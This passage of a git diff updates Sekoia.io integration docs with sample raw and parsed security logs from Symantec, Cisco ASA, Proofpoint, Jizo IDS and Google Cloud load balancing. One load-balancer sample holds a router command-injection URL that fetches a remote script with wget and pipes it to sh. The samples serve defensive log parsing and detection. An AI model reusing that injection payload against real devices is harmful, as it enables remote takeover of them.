443 + }, + "threat": { + "enrichments": [ + { + "indicator": { + "sightings": 1, + "type": "file" + } + } + ] + }, + "url": { + "domain": "9.10.11.12", + "original": "http://9.10.11.12:443/", + "path": "/", + "port": 443, + "scheme": "http" + } + } + + ``` + + === "test_scan.json" ```json @@ -429,6 +575,77 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "test_scan2.json" + + ```json + + { + "message": "Scan ID: 1720651832,Begin: 2024-07-11 12:50:07,End Time: ,Started,Duration (seconds): 0,User1: jdoe,User2: ,Scan started on all drives and all extensions.,,Command: Not a command scan (),Threats: 0,Infected: 0,Total files: 0,Omitted: 0,Computer: DNFERO234,IP Address: 1.2.3.4,Domain Name: Par d\u00e9faut,Group Name: My Domain\\Region,Server Name: XXXXX001,Scan Type: Scheduled Scan", + "event": { + "category": [ + "malware" + ], + "reason": "Scan started on all drives and all extensions.", + "start": "2024-07-11T12:50:07Z", + "type": [ + "info" + ] + }, + "@timestamp": "2024-07-11T12:50:07Z", + "broadcom": { + "endpoint_protection": { + "scan": { + "command": "Not a command scan ()", + "duration": 0, + "id": "1720651832", + "result": { + "infections": 0, + "omitted": 0, + "threats": 0, + "total": 0 + }, + "status": "started", + "type": "Scheduled Scan" + }, + "server": { + "domain": "Par d\u00e9faut", + "group": "My Domain\\Region", + "name": "XXXXX001" + } + } + }, + "host": { + "hostname": "DNFERO234", + "ip": "1.2.3.4", + "name": "DNFERO234" + }, + "observer": { + "product": "Symantec Endpoint Protection", + "vendor": "Broadcom" + }, + "related": { + "hosts": [ + "DNFERO234" + ], + "ip": [ + "1.2.3.4" + ], + "user": [ + "jdoe" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + }, + "user": { + "name": "jdoe" + } + } + + ``` + + === "test_sonar.json" ```json diff --git a/_shared_content/operations_center/integrations/generated/419bd705-fa61-496c-94fa-28d6c1f2e2a8_sample.md b/_shared_content/operations_center/integrations/generated/419bd705-fa61-496c-94fa-28d6c1f2e2a8_sample.md index 9fa3d7979c..deb8a68628 100644 --- a/_shared_content/operations_center/integrations/generated/419bd705-fa61-496c-94fa-28d6c1f2e2a8_sample.md +++ b/_shared_content/operations_center/integrations/generated/419bd705-fa61-496c-94fa-28d6c1f2e2a8_sample.md @@ -28,6 +28,14 @@ In this section, you will find examples of raw logs as generated natively by the +=== "test_control_ready_2" + + ``` + HOSTNAME,1.2.3.4,Continue,Le contrĂŽle des applications et des pĂ©riphĂ©riques est prĂȘt.,SystĂšme,Begin: 2022-10-19 06:45:39,End Time: 2022-10-19 06:45:39,Rule: RĂšgle intĂ©grĂ©e,0,SysPlant,0,SysPlant,Aucun(e),User Name: Aucun(e),Domain Name: DOMAIN,Action Type: ,File size (bytes): 0,Device ID: + ``` + + + === "test_liveupdate" ``` @@ -52,6 +60,14 @@ In this section, you will find examples of raw logs as generated natively by the +=== "test_malicious_scan_2" + + ``` + VPNP02,Event Description: [SID: 32329] Audit: Malicious Scan Attempt 2 attaque dĂ©tectĂ©e mais pas bloquĂ©e. Chemin d’application : SYSTEM,Event Type: ,Local Host IP: 1.2.3.4,Local Host MAC: 000000000000,Remote Host Name: ,Remote Host IP: 5.6.7.8,Remote Host MAC: 000000000000,Outbound,TCP,,Begin: 2022-10-19 08:26:56,End Time: 2022-10-19 08:26:56,Occurrences: 1,Application: SYSTEM,Location: Par dĂ©faut,User Name: none,Domain Name: ,Local Port: 443,Remote Port: 23203,CIDS Signature ID: 32329,CIDS Signature string: Audit: Malicious Scan Attempt 2,CIDS Signature SubID: 65536,Intrusion URL: http://9.10.11.12:443/,Intrusion Payload URL: ,SHA-256: 0000000000000000000000000000000000000000000000000000000000000000,MD-5: ,Intensive Protection Level: N/A,URL Risk: N/A,URL Category: N/A + ``` + + + === "test_scan" ``` @@ -60,6 +76,14 @@ In this section, you will find examples of raw logs as generated natively by the +=== "test_scan2" + + ``` + Scan ID: 1720651832,Begin: 2024-07-11 12:50:07,End Time: ,Started,Duration (seconds): 0,User1: jdoe,User2: ,Scan started on all drives and all extensions.,,Command: Not a command scan (),Threats: 0,Infected: 0,Total files: 0,Omitted: 0,Computer: DNFERO234,IP Address: 1.2.3.4,Domain Name: Par dĂ©faut,Group Name: My Domain\Region,Server Name: XXXXX001,Scan Type: Scheduled Scan + ``` + + + === "test_sonar" ``` diff --git a/_shared_content/operations_center/integrations/generated/41e3ca4e-a714-41aa-ad69-684a0b3835fc.md b/_shared_content/operations_center/integrations/generated/41e3ca4e-a714-41aa-ad69-684a0b3835fc.md index 2b0a7ac51d..f4c44ba0b6 100644 --- a/_shared_content/operations_center/integrations/generated/41e3ca4e-a714-41aa-ad69-684a0b3835fc.md +++ b/_shared_content/operations_center/integrations/generated/41e3ca4e-a714-41aa-ad69-684a0b3835fc.md @@ -18,7 +18,7 @@ The following table lists the data source offered by this integration. ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "activity_log_archive_creation.json" diff --git a/_shared_content/operations_center/integrations/generated/44439212-c2d8-4645-ad60-8fd5e39140b3.md b/_shared_content/operations_center/integrations/generated/44439212-c2d8-4645-ad60-8fd5e39140b3.md index bf9245ab7d..275b9fbe3b 100644 --- a/_shared_content/operations_center/integrations/generated/44439212-c2d8-4645-ad60-8fd5e39140b3.md +++ b/_shared_content/operations_center/integrations/generated/44439212-c2d8-4645-ad60-8fd5e39140b3.md @@ -17,7 +17,7 @@ The following table lists the data source offered by this integration. ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "2sv_disable.json" diff --git a/_shared_content/operations_center/integrations/generated/44d41a2b-96cb-4d37-84e0-4f0c0f9138b8.md b/_shared_content/operations_center/integrations/generated/44d41a2b-96cb-4d37-84e0-4f0c0f9138b8.md index 1f6b528202..6a049492d4 100644 --- a/_shared_content/operations_center/integrations/generated/44d41a2b-96cb-4d37-84e0-4f0c0f9138b8.md +++ b/_shared_content/operations_center/integrations/generated/44d41a2b-96cb-4d37-84e0-4f0c0f9138b8.md @@ -27,7 +27,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "alert_certificate.json" diff --git a/_shared_content/operations_center/integrations/generated/466aeca2-e112-4ccc-a109-c6d85b91bbcf.md b/_shared_content/operations_center/integrations/generated/466aeca2-e112-4ccc-a109-c6d85b91bbcf.md index 0217a741c1..eeb2943ce3 100644 --- a/_shared_content/operations_center/integrations/generated/466aeca2-e112-4ccc-a109-c6d85b91bbcf.md +++ b/_shared_content/operations_center/integrations/generated/466aeca2-e112-4ccc-a109-c6d85b91bbcf.md @@ -29,7 +29,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_106001.json" @@ -782,9 +782,9 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "target": "network-traffic" }, "destination": { - "address": "47.241.116.84", - "ip": "47.241.116.84", - "port": 10800 + "address": "10.11.0.2", + "ip": "10.11.0.2", + "port": 0 }, "network": { "direction": "inbound", @@ -801,8 +801,9 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ] }, "source": { - "address": "10.11.0.2", - "ip": "10.11.0.2" + "address": "47.241.116.84", + "ip": "47.241.116.84", + "port": 10800 } } @@ -832,9 +833,9 @@ This section demonstrates how the raw logs will be transformed by our parsers. I } }, "destination": { - "address": "1.2.3.4", - "ip": "1.2.3.4", - "port": 1 + "address": "1.2.3.5", + "ip": "1.2.3.5", + "port": 0 }, "network": { "direction": "inbound", @@ -854,8 +855,9 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ] }, "source": { - "address": "1.2.3.5", - "ip": "1.2.3.5" + "address": "1.2.3.4", + "ip": "1.2.3.4", + "port": 1 }, "user": { "domain": "LOCAL", @@ -883,9 +885,9 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "target": "network-traffic" }, "destination": { - "address": "172.16.10.208", - "ip": "172.16.10.208", - "port": 2189 + "address": "172.16.19.90", + "ip": "172.16.19.90", + "port": 0 }, "network": { "transport": "icmp" @@ -904,8 +906,9 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ] }, "source": { - "address": "172.16.19.90", - "ip": "172.16.19.90" + "address": "172.16.10.208", + "ip": "172.16.10.208", + "port": 2189 }, "user": { "name": "karibou" @@ -938,11 +941,62 @@ This section demonstrates how the raw logs will be transformed by our parsers. I } }, "destination": { + "address": "1.2.4.3", + "ip": "1.2.4.3", + "port": 0 + }, + "network": { + "transport": "icmp" + }, + "observer": { + "product": "Adaptive Security Appliance", + "vendor": "Cisco" + }, + "related": { + "ip": [ + "1.2.3.4", + "1.2.4.3" + ] + }, + "source": { "address": "1.2.3.4", "ip": "1.2.3.4", "port": 25481 + } + } + + ``` + + +=== "test_ASA_302021_3.json" + + ```json + + { + "message": "%ASA-6-302020: Built inbound ICMP connection for faddr 1.2.3.4/14 gaddr 172.1.1.1/0 laddr 172.1.1.2/0 type 8 code 0", + "event": { + "category": [ + "network" + ], + "code": "302020" + }, + "action": { + "name": "built", + "target": "network-traffic" + }, + "cisco": { + "ftd": { + "icmp_code": "0", + "icmp_type": "8" + } + }, + "destination": { + "address": "172.1.1.2", + "ip": "172.1.1.2", + "port": 0 }, "network": { + "direction": "inbound", "transport": "icmp" }, "observer": { @@ -952,12 +1006,63 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "related": { "ip": [ "1.2.3.4", - "1.2.4.3" + "172.1.1.2" ] }, "source": { - "address": "1.2.4.3", - "ip": "1.2.4.3" + "address": "1.2.3.4", + "ip": "1.2.3.4", + "port": 14 + } + } + + ``` + + +=== "test_ASA_302021_4.json" + + ```json + + { + "message": "%ASA-6-302021: Teardown ICMP connection for faddr 1.2.3.4/14 gaddr 172.1.1.1/0 laddr 172.1.1.2/0 type 8 code 0", + "event": { + "category": [ + "network" + ], + "code": "302021" + }, + "action": { + "name": "teardown", + "target": "network-traffic" + }, + "cisco": { + "ftd": { + "icmp_code": "0", + "icmp_type": "8" + } + }, + "destination": { + "address": "172.1.1.2", + "ip": "172.1.1.2", + "port": 0 + }, + "network": { + "transport": "icmp" + }, + "observer": { + "product": "Adaptive Security Appliance", + "vendor": "Cisco" + }, + "related": { + "ip": [ + "1.2.3.4", + "172.1.1.2" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "port": 14 } } diff --git a/_shared_content/operations_center/integrations/generated/466aeca2-e112-4ccc-a109-c6d85b91bbcf_sample.md b/_shared_content/operations_center/integrations/generated/466aeca2-e112-4ccc-a109-c6d85b91bbcf_sample.md index 07a5efd2cf..4dc67469a3 100644 --- a/_shared_content/operations_center/integrations/generated/466aeca2-e112-4ccc-a109-c6d85b91bbcf_sample.md +++ b/_shared_content/operations_center/integrations/generated/466aeca2-e112-4ccc-a109-c6d85b91bbcf_sample.md @@ -156,6 +156,22 @@ In this section, you will find examples of raw logs as generated natively by the +=== "test_ASA_302021_3" + + ``` + %ASA-6-302020: Built inbound ICMP connection for faddr 1.2.3.4/14 gaddr 172.1.1.1/0 laddr 172.1.1.2/0 type 8 code 0 + ``` + + + +=== "test_ASA_302021_4" + + ``` + %ASA-6-302021: Teardown ICMP connection for faddr 1.2.3.4/14 gaddr 172.1.1.1/0 laddr 172.1.1.2/0 type 8 code 0 + ``` + + + === "test_ASA_305011" ``` diff --git a/_shared_content/operations_center/integrations/generated/469bd3ae-61c9-4c39-9703-7452882e70da.md b/_shared_content/operations_center/integrations/generated/469bd3ae-61c9-4c39-9703-7452882e70da.md index 9c7bc786b6..097d0419db 100644 --- a/_shared_content/operations_center/integrations/generated/469bd3ae-61c9-4c39-9703-7452882e70da.md +++ b/_shared_content/operations_center/integrations/generated/469bd3ae-61c9-4c39-9703-7452882e70da.md @@ -29,7 +29,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "cato_sase_antimalware_events.json" diff --git a/_shared_content/operations_center/integrations/generated/46ca6fc8-3d30-434c-92ff-0e1cde564161.md b/_shared_content/operations_center/integrations/generated/46ca6fc8-3d30-434c-92ff-0e1cde564161.md index 6629b51869..9ac14dbb56 100644 --- a/_shared_content/operations_center/integrations/generated/46ca6fc8-3d30-434c-92ff-0e1cde564161.md +++ b/_shared_content/operations_center/integrations/generated/46ca6fc8-3d30-434c-92ff-0e1cde564161.md @@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_click_permitted.json" @@ -195,6 +195,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "cluster": { "id": "pharmtech_hosted" }, + "completely_rewritten": true, "email": { "to": { "address": [ @@ -294,6 +295,7 @@ The following table lists the fields that are extracted, normalized under the EC |`observer.product` | `keyword` | The product name of the observer. | |`observer.vendor` | `keyword` | Vendor name of the observer. | |`proofpoint.tap.cluster.id` | `keyword` | The name of the cluster which processed the message | +|`proofpoint.tap.completely_rewritten` | `boolean` | Falg if the message was rewritten | |`proofpoint.tap.email.to.address` | `array` | The list of recipients from the TO header | |`proofpoint.tap.modules` | `array` | The list of modules which processed the message | |`proofpoint.tap.threat.classifications` | `array` | The list of classifications of the threat | diff --git a/_shared_content/operations_center/integrations/generated/46e14ac3-0b79-42d6-8630-da4fcdb8d5f1.md b/_shared_content/operations_center/integrations/generated/46e14ac3-0b79-42d6-8630-da4fcdb8d5f1.md index cfe11712fe..3e05cd4fc6 100644 --- a/_shared_content/operations_center/integrations/generated/46e14ac3-0b79-42d6-8630-da4fcdb8d5f1.md +++ b/_shared_content/operations_center/integrations/generated/46e14ac3-0b79-42d6-8630-da4fcdb8d5f1.md @@ -1,5 +1,5 @@ -## Event Categories +### Event Categories The following table lists the data source offered by this integration. @@ -25,10 +25,9 @@ In details, the following table denotes the type of events produced by this inte -## Event Samples - -Find below few samples of events and how they are normalized by Sekoia.io. +### Transformed Events Samples after Ingestion +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "event.json" @@ -255,7 +254,7 @@ Find below few samples of events and how they are normalized by Sekoia.io. -## Extracted Fields +### Extracted Fields The following table lists the fields that are extracted, normalized under the ECS format, analyzed and indexed by the parser. It should be noted that infered fields are not listed. @@ -289,3 +288,6 @@ The following table lists the fields that are extracted, normalized under the EC |`source.port` | `long` | Port of the source. | |`url.original` | `wildcard` | Unmodified original url as seen in the event source. | + + +For more information on the Intake Format, please find the code of the Parser, Smart Descriptions, and Supported Events [here](https://github.com/SEKOIA-IO/intake-formats/tree/main/SesameIT/jizo). \ No newline at end of file diff --git a/_shared_content/operations_center/integrations/generated/46e14ac3-0b79-42d6-8630-da4fcdb8d5f1_sample.md b/_shared_content/operations_center/integrations/generated/46e14ac3-0b79-42d6-8630-da4fcdb8d5f1_sample.md new file mode 100644 index 0000000000..c2e8efdc07 --- /dev/null +++ b/_shared_content/operations_center/integrations/generated/46e14ac3-0b79-42d6-8630-da4fcdb8d5f1_sample.md @@ -0,0 +1,153 @@ + +### Raw Events Samples + +In this section, you will find examples of raw logs as generated natively by the source. These examples are provided to help integrators understand the data format before ingestion into Sekoia.io. It is crucial for setting up the correct parsing stages and ensuring that all relevant information is captured. + + +=== "event" + + + ```json + { + "timestamp": "2024-06-27T12:56:49.920281+0000", + "flow_id": 1017644745558273, + "in_iface": "icc1", + "event_type": "alert", + "src_ip": "1.2.3.4", + "src_port": 8000, + "dest_ip": "10.0.4.4", + "dest_port": 4000, + "proto": "TCP", + "alert": { + "action": "allowed", + "gid": 1, + "signature_id": 2221014, + "rev": 1, + "signature": "ET EXPLOIT Possible ETERNALBLUE Probe MS17-010 (Generic Flags)", + "category": "A Network Trojan was detected", + "severity": 3, + "metadata": { + "affected_product": [ + "machine1" + ], + "attack_target": [ + "Client_Endpoint" + ], + "signature_severity": [ + "Major" + ] + } + }, + "app_proto": "smb", + "flow": { + "pkts_toserver": 4, + "pkts_toclient": 4, + "bytes_toserver": 265, + "bytes_toclient": 701, + "start": "2024-01-07T19:54:41.492407+0000" + } + } + ``` + + + +=== "http_event" + + + ```json + { + "timestamp": "2024-06-27T13:25:18.431133+0000", + "flow_id": 1017644745558273, + "in_iface": "icc1", + "event_type": "alert", + "src_ip": "10.20.30.101", + "src_port": 49778, + "dest_ip": "203.176.135.102", + "dest_port": 8082, + "proto": "TCP", + "http": { + "http_port": 8082, + "url": "/libhtp::request_uri_not_seen", + "http_server_agent": "KSKJJGJ", + "http_content_type": "text/plain", + "status": 200, + "response_length": 3, + "request_length": 0 + }, + "app_proto": "http", + "flow": { + "pkts_toserver": 8, + "pkts_toclient": 7, + "bytes_toserver": 5427, + "bytes_toclient": 502, + "start": "2024-06-27T13:11:21.595110+0000" + }, + "alert": { + "action": "allowed", + "gid": 1, + "signature_id": 2100494, + "rev": 12, + "signature": "GPL ATTACK_RESPONSE command completed", + "category": "Potentially Bad Traffic", + "severity": 2, + "metadata": { + "updated_at": [ + "2010_09_23" + ], + "created_at": [ + "2010_09_23" + ] + } + } + } + ``` + + + +=== "rule" + + + ```json + { + "timestamp": "2024-06-27T12:56:49.920281+0000", + "flow_id": 1017644745558273, + "in_iface": "icc1", + "event_type": "alert", + "src_ip": "1.2.3.4", + "src_port": 8000, + "dest_ip": "10.0.4.4", + "dest_port": 4000, + "proto": "TCP", + "alert": { + "action": "allowed", + "gid": 1, + "signature_id": 2221014, + "rev": 1, + "signature": "ET EXPLOIT Possible ETERNALBLUE Probe MS17-010 (Generic Flags)", + "category": "A Network Trojan was detected", + "severity": 3, + "metadata": { + "affected_product": [ + "machine1" + ], + "attack_target": [ + "Client_Endpoint" + ], + "signature_severity": [ + "Major" + ] + } + }, + "app_proto": "smb", + "flow": { + "pkts_toserver": 4, + "pkts_toclient": 4, + "bytes_toserver": 265, + "bytes_toclient": 701, + "start": "2024-01-07T19:54:41.492407+0000" + } + } + ``` + + + diff --git a/_shared_content/operations_center/integrations/generated/46e45417-187b-45bb-bf81-30df7b1963a0.md b/_shared_content/operations_center/integrations/generated/46e45417-187b-45bb-bf81-30df7b1963a0.md index 4957e1a356..ee65fdf60e 100644 --- a/_shared_content/operations_center/integrations/generated/46e45417-187b-45bb-bf81-30df7b1963a0.md +++ b/_shared_content/operations_center/integrations/generated/46e45417-187b-45bb-bf81-30df7b1963a0.md @@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "Block1.json" diff --git a/_shared_content/operations_center/integrations/generated/46fe3905-9e38-4fb2-be09-44d31626b694.md b/_shared_content/operations_center/integrations/generated/46fe3905-9e38-4fb2-be09-44d31626b694.md index 66ac19eb14..cf353fe630 100644 --- a/_shared_content/operations_center/integrations/generated/46fe3905-9e38-4fb2-be09-44d31626b694.md +++ b/_shared_content/operations_center/integrations/generated/46fe3905-9e38-4fb2-be09-44d31626b694.md @@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "event.json" diff --git a/_shared_content/operations_center/integrations/generated/4760d0bc-2194-44e5-a876-85102b18d832.md b/_shared_content/operations_center/integrations/generated/4760d0bc-2194-44e5-a876-85102b18d832.md index 981bc139a1..3f73bda531 100644 --- a/_shared_content/operations_center/integrations/generated/4760d0bc-2194-44e5-a876-85102b18d832.md +++ b/_shared_content/operations_center/integrations/generated/4760d0bc-2194-44e5-a876-85102b18d832.md @@ -27,7 +27,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_conf_events_1.json" diff --git a/_shared_content/operations_center/integrations/generated/4a3bb630-951a-40d9-be5e-5c712b37248e.md b/_shared_content/operations_center/integrations/generated/4a3bb630-951a-40d9-be5e-5c712b37248e.md index e6af78cabe..77147fa35d 100644 --- a/_shared_content/operations_center/integrations/generated/4a3bb630-951a-40d9-be5e-5c712b37248e.md +++ b/_shared_content/operations_center/integrations/generated/4a3bb630-951a-40d9-be5e-5c712b37248e.md @@ -17,7 +17,7 @@ The following table lists the data source offered by this integration. ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "event_user_exec_in_pod.json" diff --git a/_shared_content/operations_center/integrations/generated/4d50ae7e-ccac-4a5b-9a4c-58a7893f93bb.md b/_shared_content/operations_center/integrations/generated/4d50ae7e-ccac-4a5b-9a4c-58a7893f93bb.md new file mode 100644 index 0000000000..de8b80aad3 --- /dev/null +++ b/_shared_content/operations_center/integrations/generated/4d50ae7e-ccac-4a5b-9a4c-58a7893f93bb.md @@ -0,0 +1,275 @@ + +### Event Categories + + +The following table lists the data source offered by this integration. + +| Data Source | Description | +| ----------- | ------------------------------------ | +| `Web logs` | None | + + + + + +In details, the following table denotes the type of events produced by this integration. + +| Name | Values | +| ---- | ------ | +| Kind | `` | +| Category | `web` | +| Type | `access` | + + + + +### Transformed Events Samples after Ingestion + +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. + +=== "accept_with_port.json" + + ```json + + { + "message": "{\"httpRequest\": {\"latency\": \"0.001115s\", \"protocol\": \"HTTP/1.1\", \"remoteIp\": \"1.2.3.4:49194\", \"requestMethod\": \"GET\", \"requestSize\": \"201\", \"requestUrl\": \"http://5.6.7.8:80/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F1.1.1.1%3A88%2Ft%7Csh%3B%60)\", \"responseSize\": \"155\", \"status\": 503, \"userAgent\": \"Go-http-client/1.1\"}, \"insertId\": \"1t7m3mbf14kc7c\", \"jsonPayload\": {\"@type\": \"type.googleapis.com/google.cloud.loadbalancing.type.LoadBalancerLogEntry\", \"backendTargetProjectNumber\": \"projects/111111111111\", \"enforcedSecurityPolicy\": {\"configuredAction\": \"THROTTLE\", \"name\": \"policy-name\", \"outcome\": \"ACCEPT\", \"priority\": 2147483646, \"rateLimitAction\": {\"key\": \"1.2.3.4\", \"outcome\": \"RATE_LIMIT_THRESHOLD_CONFORM\"}}, \"proxyStatus\": \"error=\\\"destination_unavailable\\\"; details=\\\"failed_to_pick_backend\\\"\"}, \"logName\": \"projects/integration-gcloadbalancing/logs/loadbalancing.googleapis.com%2Fexternal_regional_requests\", \"receiveTimestamp\": \"2024-08-26T15:30:31.15568806Z\", \"resource\": {\"labels\": {\"backend_name\": \"\", \"backend_scope\": \"UNKNOWN\", \"backend_scope_type\": \"UNKNOWN\", \"backend_target_name\": \"backend-name\", \"backend_target_type\": \"BACKEND_SERVICE\", \"backend_type\": \"UNKNOWN\", \"forwarding_rule_name\": \"forwarding_rule-name\", \"matched_url_path_rule\": \"UNMATCHED\", \"network_name\": \"default\", \"project_id\": \"integration-gcloadbalancing\", \"region\": \"europe-west9\", \"target_proxy_name\": \"proxy-name\", \"url_map_name\": \"url_map-name\"}, \"type\": \"http_external_regional_lb_rule\"}, \"severity\": \"WARNING\", \"timestamp\": \"2024-08-26T15:30:27.62577Z\"}", + "event": { + "action": "THROTTLE", + "category": [ + "web" + ], + "outcome": "ACCEPT", + "type": [ + "access" + ] + }, + "@timestamp": "2024-08-26T15:30:27.625770Z", + "cloud": { + "project": { + 